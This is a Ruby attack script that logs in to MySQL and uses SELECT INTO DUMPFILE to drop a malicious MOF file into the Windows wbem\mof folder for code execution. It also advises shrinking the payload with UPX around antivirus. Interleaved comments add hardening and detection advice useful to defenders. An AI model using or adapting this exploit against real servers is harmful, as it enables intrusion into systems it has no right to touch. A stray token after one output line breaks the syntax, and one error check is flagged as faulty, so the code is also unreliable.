- #!/usr/bin/env ruby
- # Code Snippet by HR. Summary: logs in to a MySQL server with the credentials below and issues SELECT ... INTO DUMPFILE so that the server process writes a hex-encoded copy of a local file to a fixed path on the server host.
- # We need mysql gem for connection handling
- require 'rubygems'
- require 'mysql'
- target='127.0.0.1' # Your Target IP running MySQL
- user='username' # MySQL User; the INTO DUMPFILE statement further down is only accepted for an account that holds the FILE privilege
- pass='password' # MySQL Password
- file='/local/path/to/evil.mof' # Local Evil .MOF File to upload
- target_path="c:\\\\windows\\\\system32\\\\wbem\\\\mof\\\\evil.mof" # Path on Target to MOF compiler. Backslashes are doubled twice because the Ruby string and then the SQL string literal each consume one level of escaping. The write can only succeed if the MySQL service account may create files under system32. NOTE(review): presumably relies on WMI compiling files dropped into wbem\mof - confirm for the Windows version concerned.
- # Establish connection or fail
- begin
- dbc = Mysql.connect(target, user, pass)
- rescue Mysql::Error => e
- puts "Connection Problem!"
- puts "\t=> #{e}"
- exit 666;
- end
- # Take our local file, convert to hex and write to target filesystem
- # This will work for any binary file, not just .MOF files.... Defensive note: that is why the control belongs on the server side - do not grant FILE to application accounts, restrict secure_file_priv (a dedicated directory, or NULL to disable file import/export), and run the MySQL service under an account that cannot write to system directories.
- # Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple.... Detection note: statements containing INTO DUMPFILE in the general or audit log, and new files under wbem\mof created by the database process, are the events to alert on.
- data = "0x" + File.open(file, 'rb').read.unpack('H*').first # whole file read into memory and rendered as one 0x... hex literal, so the bytes travel inside the SQL text
- begin
- dbc.query("SELECT #{data} INTO DUMPFILE '#{target_path}'")
- puts "File uploaded successfully!"
- rescue Mysql::Error => e
- puts "Problem writing payload to file!"white
- puts "\t=> #{e}"
- if e =~ /MySQL server has gone away/ # NOTE(review): e is the exception object rather than its message string - confirm this match can ever succeed
- puts "This is likely due to payload which is too large in size....."
- puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
- puts "\t=> Then try again....."
- end
- end
- #EOF